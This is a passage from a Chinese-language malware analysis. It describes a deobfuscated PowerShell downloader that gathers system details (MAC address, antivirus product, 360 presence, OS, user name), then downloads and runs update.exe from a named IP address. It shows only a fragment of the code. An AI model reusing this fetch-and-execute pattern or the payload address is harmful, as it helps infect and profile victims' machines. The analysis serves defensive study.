New-Item $path -type file
}catch{}
大致意思是,獲取mac地址,AntiVirusProduct(本機安裝的殺軟名稱),是否安裝360的產品,也就是zhudongfangyu。
獲取系統版本號,系統位數,電腦名稱,用戶名等,拼接在參數中并請求下載exe,json文件。樣本中地址是http://172.104.73.9/dll.exe,但是現在已經無法訪問。
這里會判斷一下Driver服務是否在運行,如果運行的話,就不會下載了。下載后的名字應該是update.exe,然后執行。反正這個代碼也很簡單,我都已經幫大家去掉混淆了
。
云上樣本就是這么簡單因為已經無法訪問,所以我也沒法繼續分析了
